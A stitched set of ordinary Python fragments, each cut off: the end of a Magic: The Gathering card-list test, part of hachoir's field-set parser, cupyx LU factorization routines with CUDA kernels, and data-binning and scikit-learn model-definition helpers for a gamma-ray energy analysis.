self.assertTrue(cards.where_exactly(name="Izzet Signet")[0] in tgci['RU'])
tgc = testlist.grouped_by_color()
tgcards = PCardList(list(card for sublist in tgc.values() for card in sublist))
self.assertEqual(len(tgcards), len(testlist))
self.assertTrue(tgcards.has_all(testlist))
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgc[''])
self.assertTrue(testlist.where_exactly(name="Ashnod")[0] in tgc[''])
self.assertTrue(testlist.where_exactly(name="Clue")[0] in tgc[''])
self.assertTrue(testlist.where_exactly(name="Blazing Torch")[0] in tgc[''])
self.assertTrue(testlist.where_exactly(name="Wild Mongrel")[0] in tgc['G'])
self.assertTrue(testlist.where_exactly(name="Appeal // Authority")[0] in tgc['GW'])
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgc['RW'])
self.assertTrue(testlist.where_exactly(name="Angel")[0] in tgc['W'])
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgc['G'])
self.assertTrue(testlist.where_exactly(name="Forest")[0] in tgc[''])
self.assertTrue(testlist.where_exactly(name="Izzet Signet")[0] in tgc[''])
cards.grouped_by_color()
cards.grouped_by_color_identity()
cards.grouped_by_converted_mana_cost()
cards.grouped_by_simple_type()
cards.mana_symbol_counts()
def test_stats(self):
self.assertEqual(creatures.converted_mana_cost(), 159)
self.assertEqual(basic_lands.converted_mana_cost(), 0)
self.assertEqual(non_basic_lands.converted_mana_cost(), 0)
self.assertEqual(tokens.converted_mana_cost(), 0)
self.assertEqual(other.converted_mana_cost(), 0)
self.assertEqual(testlist.where_exactly(name="Izzet Signet")[0:1].converted_mana_cost(), 2)
self.assertEqual(creatures.average_mana_cost(), 159 / 48)
self.assertEqual(basic_lands.average_mana_cost(), 0)
self.assertEqual(non_basic_lands.average_mana_cost(), 0)
self.assertEqual(tokens.average_mana_cost(), 0)
self.assertEqual(other.average_mana_cost(), 0)
self.assertEqual(testlist.where_exactly(name="Izzet Signet")[0:2].average_mana_cost(), 2)
self.assertEqual(creatures.mana_symbol_counts()['G'], 9)
self.assertEqual(creatures.mana_symbol_counts()['W'], 12)
self.assertEqual(non_creature_spells.mana_symbol_counts()['W'], 12)
lands = non_basic_lands + basic_lands
self.assertEqual(lands.mana_symbol_counts()['G'], 0)
self.assertEqual(lands.mana_symbol_counts()['U'], 0)
self.assertEqual(lands.mana_symbol_counts()['W'], 0)
self.assertEqual(lands.mana_symbol_counts()['B'], 0)
self.assertEqual(lands.mana_symbol_counts()['R'], 0)
self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['B'], 4)
self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['U'], 0)
self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['W'], 0)
self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['R'], 0)
self.assertEqual(cards.where_exactly(name='Liliana of the Veil')[0:2].mana_symbol_counts()['G'], 0)
self.assertEqual(creatures.where_exactly(name='Belligerent Hatchling')[0:2].mana_symbol_counts()['W'], 2)
self.assertEqual(creatures.where_exactly(name='Belligerent Hatchling')[0:2].mana_symbol_counts()['R'], 2)
self.assertEqual(creatures.where_exactly(name='Civilized Scholar // Homicidal Brute')[0:2].mana_symbol_counts()['U'], 2)
self.assertEqual(non_creature_spells.where_exactly(name='Alive // Well')[0:2].mana_symbol_counts()['G'], 2)
self.assertEqual(non_creature_spells.where_exactly(name='Alive // Well')[0:2].mana_symbol_counts()['W'], 2)
def test_random(self):
for _ in range(50):
self.assertTrue(testlist.random_card() in testlist)
for _ in range(50):
self.assertTrue(testlist.has_all(testlist.random_sample(20, duplicates=True)))
for _ in range(50):
self.assertTrue(testlist.has_all(testlist.random_sample(20, duplicates=False)))
for _ in range(50):
self.assertTrue(testlist.has_all(testlist.random_pack()))
init = testlist.random_pack()
mythnum = 0
rarenum = 0
for _ in range(100):
random_pack = testlist.random_pack()
rares = [card for card in random_pack if card.rarity == 'rare']
uncs = [card for card in random_pack if card.rarity == 'uncommon']
coms = [card for card in random_pack if card.rarity == 'common']
myths = [card for card in random_pack if 'mythic' in card.rarity]
mythnum += len(myths)
rarenum += len(rares)
self.assertEqual(len(rares + myths), 1)
self.assertEqual(len(uncs), 3)
self.assertEqual(len(coms), 11)
self.assertFalse(init.has_all(random_pack))
| |
from hachoir.field import (MissingField, BasicFieldSet, Field, ParserError,
createRawField, createNullField, createPaddingField, FakeArray)
from hachoir.core.dict import Dict, UniqKeyError
from hachoir.core.tools import lowerBound, makeUnicode
import hachoir.core.config as config
class GenericFieldSet(BasicFieldSet):
"""
Ordered list of fields. Use operator [] to access fields using their
name (field names are unique in a field set, but not in the whole
document).
Class attributes:
- endian: Bytes order (L{BIG_ENDIAN}, L{LITTLE_ENDIAN} or L{MIDDLE_ENDIAN}).
Optional if the field set has a parent ;
- static_size: (optional) Size of FieldSet in bits. This attribute should
be used in parser of constant size.
Instance attributes/methods:
- _fields: Ordered dictionnary of all fields, may be incomplete
because feeded when a field is requested ;
- stream: Input stream used to feed fields' value
- root: The root of all field sets ;
- __len__(): Number of fields, may need to create field set ;
- __getitem__(): Get an field by it's name or it's path.
And attributes inherited from Field class:
- parent: Parent field (may be None if it's the root) ;
- name: Field name (unique in parent field set) ;
- value: The field set ;
- address: Field address (in bits) relative to parent ;
- description: A string describing the content (can be None) ;
- size: Size of field set in bits, may need to create field set.
Event handling:
- "connectEvent": Connect an handler to an event ;
- "raiseEvent": Raise an event.
To implement a new field set, you need to:
- create a class which inherite from FieldSet ;
- write createFields() method using lines like:
yield Class(self, "name", ...) ;
- and maybe set endian and static_size class attributes.
"""
_current_size = 0
def __init__(self, parent, name, stream, description=None, size=None):
"""
Constructor
@param parent: Parent field set, None for root parser
@param name: Name of the field, have to be unique in parent. If it ends
with "[]", end will be replaced with "[new_id]" (eg. "raw[]"
becomes "raw[0]", next will be "raw[1]", and then "raw[2]", etc.)
@type name: str
@param stream: Input stream from which data are read
@type stream: L{InputStream}
@param description: Optional string description
@type description: str|None
@param size: Size in bits. If it's None, size will be computed. You
can also set size with class attribute static_size
"""
BasicFieldSet.__init__(self, parent, name, stream, description, size)
self._fields = Dict()
self._field_generator = self.createFields()
self._array_cache = {}
self.__is_feeding = False
def array(self, key):
try:
return self._array_cache[key]
except KeyError:
array = FakeArray(self, key)
self._array_cache[key] = array
return self._array_cache[key]
def reset(self):
"""
Reset a field set:
* clear fields ;
* restart field generator ;
* set current size to zero ;
* clear field array count.
But keep: name, value, description and size.
"""
BasicFieldSet.reset(self)
self._fields = Dict()
self._field_generator = self.createFields()
self._current_size = 0
self._array_cache = {}
def __str__(self):
return '<%s path=%s, current_size=%s, current length=%s>' % \
(self.__class__.__name__, self.path,
self._current_size, len(self._fields))
def __len__(self):
"""
Returns number of fields, may need to create all fields
if it's not done yet.
"""
if self._field_generator is not None:
self._feedAll()
return len(self._fields)
def _getCurrentLength(self):
return len(self._fields)
current_length = property(_getCurrentLength)
def _getSize(self):
if self._size is None:
self._feedAll()
return self._size
size = property(
_getSize, doc="Size in bits, may create all fields to get size")
def _getCurrentSize(self):
assert not(self.done)
return self._current_size
current_size = property(_getCurrentSize)
eof = property(lambda self: self._checkSize(
self._current_size + 1, True) < 0)
def _checkSize(self, size, strict):
field = self
while field._size is None:
if not field._parent:
assert self.stream.size is None
if not strict:
return None
if self.stream.sizeGe(size):
return 0
break
size += field._address
field = field._parent
return field._size - size
autofix = property(lambda self: self.root.autofix)
def _addField(self, field):
"""
Add a field to the field set:
* add it into _fields
* update _current_size
May raise a StopIteration() on error
"""
if not issubclass(field.__class__, Field):
raise ParserError("Field type (%s) is not a subclass of 'Field'!"
% field.__class__.__name__)
assert isinstance(field._name, str)
if field._name.endswith("[]"):
self.setUniqueFieldName(field)
if config.debug:
self.info("[+] DBG: _addField(%s)" % field.name)
# required for the msoffice parser
if field._address != self._current_size:
self.warning("Fix address of %s to %s (was %s)" %
(field.path, self._current_size, field._address))
field._address = self._current_size
ask_stop = False
# Compute field size and check that there is enough place for it
self.__is_feeding = True
try:
field.size
except Exception as err:
if field.is_field_set and field.current_length and field.eof:
self.warning(
"Error when getting size of '%s': %s" % (field.name, err))
field._stopFeeding()
ask_stop = True
else:
self.warning(
"Error when getting size of '%s': delete it" % field.name)
self.__is_feeding = False
raise
self.__is_feeding = False
# No more place?
dsize = self._checkSize(field._address + field.size, False)
if (dsize is not None and dsize < 0) or (field.is_field_set and field.size <= 0):
if self.autofix and self._current_size:
self._fixFieldSize(field, field.size + dsize)
else:
raise ParserError("Field %s is too large!" % field.path)
self._current_size += field.size
try:
self._fields.append(field._name, field)
except UniqKeyError as err:
self.warning("Duplicate field name " + str(err))
field._name += "[]"
self.setUniqueFieldName(field)
self._fields.append(field._name, field)
if ask_stop:
raise StopIteration()
def _fixFieldSize(self, field, new_size):
if new_size > 0:
if field.is_field_set and 0 < field.size:
field._truncate(new_size)
return
# Don't add the field <=> delete item
if self._size is None:
self._size = self._current_size + new_size
self.warning("[Autofix] Delete '%s' (too large)" % field.path)
raise StopIteration()
def _getField(self, name, const):
field = Field._getField(self, name, const)
if field is None:
if name in self._fields:
field = self._fields[name]
elif self._field_generator is not None and not const:
field = self._feedUntil(name)
return field
def getField(self, key, const=True):
if isinstance(key, int):
if key < 0:
raise KeyError("Key must be positive!")
if not const:
self.readFirstFields(key + 1)
if len(self._fields.values) <= key:
raise MissingField(self, key)
return self._fields.values[key]
return Field.getField(self, key, const)
def _truncate(self, size):
assert size > 0
if size < self._current_size:
self._size = size
while True:
field = self._fields.values[-1]
if field._address < size:
break
del self._fields[-1]
self._current_size = field._address
size -= field._address
if size < field._size:
if field.is_field_set:
field._truncate(size)
else:
del self._fields[-1]
field = createRawField(self, size, "raw[]")
self._fields.append(field._name, field)
self._current_size = self._size
else:
assert self._size is None or size < self._size
self._size = size
if self._size == self._current_size:
self._field_generator = None
def _deleteField(self, index):
field = self._fields.values[index]
size = field.size
self._current_size -= size
del self._fields[index]
return field
def _fixLastField(self):
"""
Try to fix last field when we know current field set size.
Returns new added field if any, or None.
"""
assert self._size is not None
# Stop parser
message = ["stop parser"]
self._field_generator = None
# If last field is too big, delete it
while self._size < self._current_size:
field = self._deleteField(len(self._fields) - 1)
message.append("delete field %s" % field.path)
assert self._current_size <= self._size
# If field size current is smaller: add a raw field
size = self._size - self._current_size
if size:
field = createRawField(self, size, "raw[]")
message.append("add padding")
self._current_size += field.size
self._fields.append(field._name, field)
else:
field = None
message = ", ".join(message)
self.warning("[Autofix] Fix parser error: " + message)
assert self._current_size == self._size
return field
def _stopFeeding(self):
new_field = None
if self._size is None:
if self._parent:
self._size = self._current_size
elif self._size != self._current_size:
if self.autofix:
new_field = self._fixLastField()
else:
raise ParserError("Invalid parser \"%s\" size!" % self.path)
self._field_generator = None
return new_field
def _fixFeedError(self, exception):
"""
Try to fix a feeding error. Returns False if error can't be fixed,
otherwise returns new field if any, or None.
"""
if self._size is None or not self.autofix:
return False
self.warning(makeUnicode(exception))
return self._fixLastField()
def _feedUntil(self, field_name):
"""
Return the field if it was found, None else
"""
if self.__is_feeding \
or (self._field_generator and self._field_generator.gi_running):
self.warning("Unable to get %s (and generator is already running)"
% field_name)
return None
try:
while True:
field = next(self._field_generator)
self._addField(field)
if field.name == field_name:
return field
except StopIteration:
self._stopFeeding()
except Exception as err:
if self._fixFeedError(err) is False:
raise
return None
def readMoreFields(self, number):
"""
Read more number fields, or do nothing if parsing is done.
Returns number of new added fields.
"""
if self._field_generator is | |
from warnings import warn
import numpy
import cupy
from cupy.cuda import cublas
from cupy.cuda import cusolver
from cupy.cuda import device
from cupy.linalg import _util
def lu_factor(a, overwrite_a=False, check_finite=True):
"""LU decomposition.
Decompose a given two-dimensional square matrix into ``P * L * U``,
where ``P`` is a permutation matrix, ``L`` lower-triangular with
unit diagonal elements, and ``U`` upper-triangular matrix.
Args:
a (cupy.ndarray): The input matrix with dimension ``(M, N)``
overwrite_a (bool): Allow overwriting data in ``a`` (may enhance
performance)
check_finite (bool): Whether to check that the input matrices contain
only finite numbers. Disabling may give a performance gain, but may
result in problems (crashes, non-termination) if the inputs do
contain infinities or NaNs.
Returns:
tuple:
``(lu, piv)`` where ``lu`` is a :class:`cupy.ndarray`
storing ``U`` in its upper triangle, and ``L`` without
unit diagonal elements in its lower triangle, and ``piv`` is
a :class:`cupy.ndarray` storing pivot indices representing
permutation matrix ``P``. For ``0 <= i < min(M,N)``, row
``i`` of the matrix was interchanged with row ``piv[i]``
.. seealso:: :func:`scipy.linalg.lu_factor`
.. note::
Current implementation returns result different from SciPy when the
matrix singular. SciPy returns an array containing ``0.`` while the
current implementation returns an array containing ``nan``.
>>> import numpy as np
>>> import scipy.linalg
>>> scipy.linalg.lu_factor(np.array([[0, 1], [0, 0]], \
dtype=np.float32))
(array([[0., 1.],
[0., 0.]], dtype=float32), array([0, 1], dtype=int32))
>>> import cupy as cp
>>> import cupyx.scipy.linalg
>>> cupyx.scipy.linalg.lu_factor(cp.array([[0, 1], [0, 0]], \
dtype=cp.float32))
(array([[ 0., 1.],
[nan, nan]], dtype=float32), array([0, 1], dtype=int32))
"""
return _lu_factor(a, overwrite_a, check_finite)
def lu(a, permute_l=False, overwrite_a=False, check_finite=True):
"""LU decomposition.
Decomposes a given two-dimensional matrix into ``P @ L @ U``, where ``P``
is a permutation matrix, ``L`` is a lower triangular or trapezoidal matrix
with unit diagonal, and ``U`` is a upper triangular or trapezoidal matrix.
Args:
a (cupy.ndarray): The input matrix with dimension ``(M, N)``.
permute_l (bool): If ``True``, perform the multiplication ``P @ L``.
overwrite_a (bool): Allow overwriting data in ``a`` (may enhance
performance)
check_finite (bool): Whether to check that the input matrices contain
only finite numbers. Disabling may give a performance gain, but may
result in problems (crashes, non-termination) if the inputs do
contain infinities or NaNs.
Returns:
tuple:
``(P, L, U)`` if ``permute_l == False``, otherwise ``(PL, U)``.
``P`` is a :class:`cupy.ndarray` storing permutation matrix with
dimension ``(M, M)``. ``L`` is a :class:`cupy.ndarray` storing
lower triangular or trapezoidal matrix with unit diagonal with
dimension ``(M, K)`` where ``K = min(M, N)``. ``U`` is a
:class:`cupy.ndarray` storing upper triangular or trapezoidal
matrix with dimension ``(K, N)``. ``PL`` is a :class:`cupy.ndarray`
storing permuted ``L`` matrix with dimension ``(M, K)``.
.. seealso:: :func:`scipy.linalg.lu`
"""
lu, piv = _lu_factor(a, overwrite_a, check_finite)
m, n = lu.shape
k = min(m, n)
L, U = _cupy_split_lu(lu)
if permute_l:
_cupy_laswp(L, 0, k-1, piv, -1)
return (L, U)
else:
r_dtype = numpy.float32 if lu.dtype.char in 'fF' else numpy.float64
P = cupy.diag(cupy.ones((m,), dtype=r_dtype))
_cupy_laswp(P, 0, k-1, piv, -1)
return (P, L, U)
def _lu_factor(a, overwrite_a=False, check_finite=True):
a = cupy.asarray(a)
_util._assert_rank2(a)
dtype = a.dtype
if dtype.char == 'f':
getrf = cusolver.sgetrf
getrf_bufferSize = cusolver.sgetrf_bufferSize
elif dtype.char == 'd':
getrf = cusolver.dgetrf
getrf_bufferSize = cusolver.dgetrf_bufferSize
elif dtype.char == 'F':
getrf = cusolver.cgetrf
getrf_bufferSize = cusolver.cgetrf_bufferSize
elif dtype.char == 'D':
getrf = cusolver.zgetrf
getrf_bufferSize = cusolver.zgetrf_bufferSize
else:
msg = 'Only float32, float64, complex64 and complex128 are supported.'
raise NotImplementedError(msg)
a = a.astype(dtype, order='F', copy=(not overwrite_a))
if check_finite:
if a.dtype.kind == 'f' and not cupy.isfinite(a).all():
raise ValueError(
'array must not contain infs or NaNs')
cusolver_handle = device.get_cusolver_handle()
dev_info = cupy.empty(1, dtype=numpy.int32)
m, n = a.shape
ipiv = cupy.empty((min(m, n),), dtype=numpy.intc)
buffersize = getrf_bufferSize(cusolver_handle, m, n, a.data.ptr, m)
workspace = cupy.empty(buffersize, dtype=dtype)
# LU factorization
getrf(cusolver_handle, m, n, a.data.ptr, m, workspace.data.ptr,
ipiv.data.ptr, dev_info.data.ptr)
if dev_info[0] < 0:
raise ValueError('illegal value in %d-th argument of '
'internal getrf (lu_factor)' % -dev_info[0])
elif dev_info[0] > 0:
warn('Diagonal number %d is exactly zero. Singular matrix.'
% dev_info[0], RuntimeWarning, stacklevel=2)
# cuSolver uses 1-origin while SciPy uses 0-origin
ipiv -= 1
return (a, ipiv)
def _cupy_split_lu(LU, order='C'):
assert LU._f_contiguous
m, n = LU.shape
k = min(m, n)
order = 'F' if order == 'F' else 'C'
L = cupy.empty((m, k), order=order, dtype=LU.dtype)
U = cupy.empty((k, n), order=order, dtype=LU.dtype)
size = m * n
_kernel_cupy_split_lu(LU, m, n, k, L._c_contiguous, L, U, size=size)
return (L, U)
_device_get_index = '''
__device__ inline int get_index(int row, int col, int num_rows, int num_cols,
bool c_contiguous)
{
if (c_contiguous) {
return col + num_cols * row;
} else {
return row + num_rows * col;
}
}
'''
_kernel_cupy_split_lu = cupy.ElementwiseKernel(
'raw T LU, int32 M, int32 N, int32 K, bool C_CONTIGUOUS',
'raw T L, raw T U',
'''
// LU: shape: (M, N)
// L: shape: (M, K)
// U: shape: (K, N)
const T* ptr_LU = &(LU[0]);
T* ptr_L = &(L[0]);
T* ptr_U = &(U[0]);
int row, col;
if (C_CONTIGUOUS) {
row = i / N;
col = i % N;
} else {
row = i % M;
col = i / M;
}
T lu_val = ptr_LU[get_index(row, col, M, N, false)];
T l_val, u_val;
if (row > col) {
l_val = lu_val;
u_val = static_cast<T>(0);
} else if (row == col) {
l_val = static_cast<T>(1);
u_val = lu_val;
} else {
l_val = static_cast<T>(0);
u_val = lu_val;
}
if (col < K) {
ptr_L[get_index(row, col, M, K, C_CONTIGUOUS)] = l_val;
}
if (row < K) {
ptr_U[get_index(row, col, K, N, C_CONTIGUOUS)] = u_val;
}
''',
'cupy_split_lu', preamble=_device_get_index
)
def _cupy_laswp(A, k1, k2, ipiv, incx):
m, n = A.shape
k = ipiv.shape[0]
assert 0 <= k1 and k1 <= k2 and k2 < k
assert A._c_contiguous or A._f_contiguous
_kernel_cupy_laswp(m, n, k1, k2, ipiv, incx, A._c_contiguous, A, size=n)
_kernel_cupy_laswp = cupy.ElementwiseKernel(
'int32 M, int32 N, int32 K1, int32 K2, raw I IPIV, int32 INCX, '
'bool C_CONTIGUOUS',
'raw T A',
'''
// IPIV: 0-based pivot indices. shape: (K,) (*) K > K2
// A: shape: (M, N)
T* ptr_A = &(A[0]);
if (K1 > K2) return;
int row_start, row_end, row_inc;
if (INCX > 0) {
row_start = K1; row_end = K2; row_inc = 1;
} else if (INCX < 0) {
row_start = K2; row_end = K1; row_inc = -1;
} else {
return;
}
int col = i;
int row1 = row_start;
while (1) {
int row2 = IPIV[row1];
if (row1 != row2) {
int idx1 = get_index(row1, col, M, N, C_CONTIGUOUS);
int idx2 = get_index(row2, col, M, N, C_CONTIGUOUS);
T tmp = ptr_A[idx1];
ptr_A[idx1] = ptr_A[idx2];
ptr_A[idx2] = tmp;
}
if (row1 == row_end) break;
row1 += row_inc;
}
''',
'cupy_laswp', preamble=_device_get_index
)
def lu_solve(lu_and_piv, b, trans=0, overwrite_b=False, check_finite=True):
"""Solve an equation system, ``a * x = b``, given the LU factorization of ``a``
Args:
lu_and_piv (tuple): LU factorization of matrix ``a`` (``(M, M)``)
together with pivot indices.
b (cupy.ndarray): The matrix with dimension ``(M,)`` or
``(M, N)``.
trans ({0, 1, 2}): Type of system to solve:
======== =========
trans system
======== =========
0 a x = b
1 a^T x = b
2 a^H x = b
======== =========
overwrite_b (bool): Allow overwriting data in b (may enhance
performance)
check_finite (bool): Whether to check that the input matrices contain
only finite numbers. Disabling may give a performance gain, but may
result in problems (crashes, non-termination) if the inputs do
contain infinities or NaNs.
Returns:
cupy.ndarray:
The matrix with dimension ``(M,)`` or ``(M, N)``.
.. seealso:: :func:`scipy.linalg.lu_solve`
"""
(lu, ipiv) = lu_and_piv
_util._assert_cupy_array(lu)
_util._assert_rank2(lu)
_util._assert_nd_squareness(lu)
m = lu.shape[0]
if m != b.shape[0]:
raise ValueError('incompatible dimensions.')
dtype = lu.dtype
if dtype.char == 'f':
getrs = cusolver.sgetrs
elif dtype.char == 'd':
getrs = cusolver.dgetrs
elif dtype.char == 'F':
getrs = cusolver.cgetrs
elif dtype.char == 'D':
getrs = cusolver.zgetrs
else:
msg = 'Only float32, float64, complex64 and complex128 are supported.'
raise NotImplementedError(msg)
if trans == 0:
trans = cublas.CUBLAS_OP_N
elif trans == 1:
trans = cublas.CUBLAS_OP_T
elif trans == 2:
trans = cublas.CUBLAS_OP_C
else:
raise ValueError('unknown trans')
| |
Load the reduced data from reduced_data/.
Parameters
----------
suffix: str
The suffix added to the file name (the nominal is dtf.joblib)
Returns
-------
dtf: pandas DataFrames of the reduced data
'''
if suffix != '':
if not suffix.startswith('_'):
suffix = '_{}'.format(suffix)
data_file_name = Path('reduced_data').joinpath(
'dtf{}.joblib'.format(suffix)
)
return load(data_file_name)
def bin_data_in_energy(dtf, n_bins=20, log_e_reco_bins=None, return_bins=False):
'''
Bin the data in dtf to n_bins with equal statistics.
Parameters
----------
dtf: pandas DataFrame
The DataFrame containing the data.
Must contain a 'log_reco_energy' column (used to calculate the bins).
n_bins: int, default=20
The number of reconstructed energy bins to divide the data in.
log_e_reco_bins: array-like, None
In case it is not none, it will be used as the energy bins to divide the data sample
return_bins: bool
If true, the function will return the log_e_reco_bins used to bin the data.
Returns
-------
A dictionary of DataFrames (keys=energy ranges, values=separated DataFrames).
'''
dtf_e = dict()
if log_e_reco_bins is None:
log_e_reco_bins = mstats.mquantiles(
dtf['log_reco_energy'].values,
np.linspace(0, 1, n_bins)
)
for i_e_bin, log_e_high in enumerate(log_e_reco_bins):
if i_e_bin == 0:
continue
mask = np.logical_and(
dtf['log_reco_energy'] > log_e_reco_bins[i_e_bin - 1],
dtf['log_reco_energy'] < log_e_high
)
this_dtf = dtf[mask]
this_e_range = '{:3.3f} < E < {:3.3f} TeV'.format(
10**log_e_reco_bins[i_e_bin - 1],
10**log_e_high
)
if len(this_dtf) < 1:
raise RuntimeError('The range {} is empty'.format(this_e_range))
dtf_e[this_e_range] = this_dtf
if return_bins:
return dtf_e, log_e_reco_bins
else:
return dtf_e
def extract_energy_bins(e_ranges):
'''
Extract the energy bins from the list of energy ranges.
This is a little weird function which can probably be avoided if we use a class
instead of a namespace. However, it is useful for now so...
Parameters
----------
e_ranges: list of str
A list of energy ranges in string form as '{:3.3f} < E < {:3.3f} TeV'.
Returns
-------
energy_bins: list of floats
List of energy bin edges given in e_ranges.
'''
energy_bins = list()
for this_range in e_ranges:
low_e = float(this_range.split()[0])
energy_bins.append(low_e)
energy_bins.append(float(list(e_ranges)[-1].split()[4])) # Add also the upper bin edge
return energy_bins
def extract_energy_bins_centers(e_ranges):
'''
Extract the energy bins from the list of energy ranges.
This is a little weird function which can probably be avoided if we use a class
instead of a namespace. However, it is useful for now so...
Parameters
----------
e_ranges: list of str
A list of energy ranges in string form as '{:3.3f} < E < {:3.3f} TeV'.
Returns
-------
energy_bin_centers: list of floats
Energy bins calculated as the averages of the energy ranges in e_ranges.
'''
energy_bin_centers = list()
for this_range in e_ranges:
low_e = float(this_range.split()[0])
high_e = float(this_range.split()[4])
energy_bin_centers.append((high_e + low_e)/2.)
return energy_bin_centers
def split_data_train_test(dtf_e, test_size=0.75, random_state=75):
'''
Split the data into training and testing datasets.
The data is split in each energy range separately with 'test_size'
setting the fraction of the test sample.
Parameters
----------
dtf_e: dict of pandas DataFrames
Each entry in the dict is a DataFrame containing the data to split.
The keys of the dict are the energy ranges of the data.
test_size: float or int, default=0.75
If float, should be between 0.0 and 1.0 and represents the proportion of the dataset
to include in the test split. If int, represents the absolute number of test samples.
If None it will be set to 0.25.
random_state: int
Returns
-------
Two dictionaries of DataFrames, one for training and one for testing
(keys=energy ranges, values=separated DataFrames).
'''
dtf_e_train = dict()
dtf_e_test = dict()
for this_e_range, this_dtf in dtf_e.items():
dtf_e_train[this_e_range], dtf_e_test[this_e_range] = model_selection.train_test_split(
this_dtf,
test_size=test_size,
random_state=random_state
)
return dtf_e_train, dtf_e_test
def add_event_type_column(dtf, labels, n_types=2):
'''
Add an event type column by dividing the data into n_types bins with equal statistics
based on the labels column in dtf.
Unlike in most cases in this code, dtf is the DataFrame itself,
not a dict of energy ranges. This function should be called per energy bin.
Parameters
----------
dtf: pandas DataFrames
A DataFrame to add event types to.
labels: str
Name of the variable used as the labels in the training.
n_types: int
The number of types to divide the data in.
Returns
-------
A DataFrame with an additional event_type column.
'''
event_type_quantiles = np.linspace(0, 1, n_types + 1)
event_types_bins = mstats.mquantiles(dtf[labels].values, event_type_quantiles)
event_types = list()
for this_value in dtf[labels].values:
this_event_type = np.searchsorted(event_types_bins, this_value)
if this_event_type < 1:
this_event_type = 1
if this_event_type > n_types:
this_event_type = n_types
event_types.append(this_event_type)
dtf.loc[:, 'event_type'] = event_types
return dtf
def define_regressors():
'''
Define regressors to train the data with.
All possible regressors should be added here.
Regressors can be simple ones or pipelines that include standardisation or anything else.
The parameters for the regressors are hard coded since they are expected to more or less
stay constant once tuned.
TODO: Include a feature selection method in the pipeline?
That way it can be done automatically separately in each energy bin.
(see https://scikit-learn.org/stable/modules/feature_selection.html).
Returns
-------
A dictionary of regressors to train.
'''
regressors = dict()
regressors['random_forest'] = RandomForestRegressor(n_estimators=300, random_state=0, n_jobs=8)
regressors['MLP_relu'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='normal', random_state=0),
MLPRegressor(
hidden_layer_sizes=(100, 50),
solver='adam',
max_iter=20000,
activation='relu',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
regressors['MLP_logistic'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='normal', random_state=0),
MLPRegressor(
hidden_layer_sizes=(80, 45),
solver='adam',
max_iter=20000,
activation='logistic',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
regressors['MLP_uniform'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='uniform', random_state=0),
MLPRegressor(
hidden_layer_sizes=(80, 45),
solver='adam',
max_iter=20000,
activation='tanh',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
regressors['MLP_tanh'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='normal', random_state=0),
MLPRegressor(
hidden_layer_sizes=(36, 6),
solver='adam',
max_iter=20000,
activation='tanh',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
regressors['MLP_lbfgs'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='normal', random_state=0),
MLPRegressor(
hidden_layer_sizes=(36, 6),
solver='lbfgs',
max_iter=20000,
activation='logistic',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
regressors['BDT'] = AdaBoostRegressor(
DecisionTreeRegressor(max_depth=30, random_state=0),
n_estimators=100, random_state=0
)
regressors['BDT_small'] = AdaBoostRegressor(
DecisionTreeRegressor(max_depth=30, random_state=0),
n_estimators=30, random_state=0
)
regressors['linear_regression'] = LinearRegression(n_jobs=4)
regressors['ridge'] = Ridge(alpha=1.0)
regressors['SVR'] = SVR(C=10.0, epsilon=0.2)
regressors['linear_SVR'] = make_pipeline(
preprocessing.StandardScaler(),
LinearSVR(random_state=0, tol=1e-5, C=10.0, epsilon=0.2, max_iter=100000)
)
regressors['SGD'] = make_pipeline(
preprocessing.StandardScaler(),
SGDRegressor(loss='epsilon_insensitive', max_iter=20000, tol=1e-5)
)
return regressors
def define_classifiers():
'''
Define classifiers to train the data with.
All possible classifiers should be added here.
Classifiers can be simple ones or pipelines that include standardisation or anything else.
The parameters for the classifiers are hard coded since they are expected to more or less
stay constant once tuned.
TODO: Include a feature selection method in the pipeline?
That way it can be done automatically separately in each energy bin.
(see https://scikit-learn.org/stable/modules/feature_selection.html).
Returns
-------
A dictionary of classifiers to train.
'''
classifiers = dict()
classifiers['random_forest_classifier'] = RandomForestClassifier(
n_estimators=100,
random_state=0,
n_jobs=8
)
classifiers['MLP_classifier'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='normal', random_state=0),
MLPClassifier(
hidden_layer_sizes=(36, 6),
solver='adam',
max_iter=20000,
activation='tanh',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
classifiers['MLP_relu_classifier'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='normal', random_state=0),
MLPClassifier(
hidden_layer_sizes=(100, 50),
solver='adam',
max_iter=20000,
activation='relu',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
classifiers['MLP_logistic_classifier'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='normal', random_state=0),
MLPClassifier(
hidden_layer_sizes=(80, 45),
solver='adam',
max_iter=20000,
activation='logistic',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
classifiers['MLP_uniform_classifier'] = make_pipeline(
preprocessing.QuantileTransformer(output_distribution='uniform', random_state=0),
MLPClassifier(
hidden_layer_sizes=(80, 45),
solver='adam',
max_iter=20000,
activation='tanh',
tol=1e-5,
# early_stopping=True,
random_state=0
)
)
classifiers['BDT_classifier'] = AdaBoostClassifier(
n_estimators=100, random_state=0
)
classifiers['ridge_classifier'] = RidgeClassifier()
classifiers['ridgeCV_classifier'] = RidgeClassifierCV(
alphas=[1e-3, 1e-2, 1e-1, 1],
normalize=True
)
classifiers['SVC_classifier'] = SVC(gamma=2, C=1)
classifiers['SGD_classifier'] = make_pipeline(
preprocessing.StandardScaler(),
SGDClassifier(loss='epsilon_insensitive', max_iter=20000, tol=1e-5)
)
classifiers['Gaussian_process_classifier'] = GaussianProcessClassifier(1.0 * RBF(1.0))
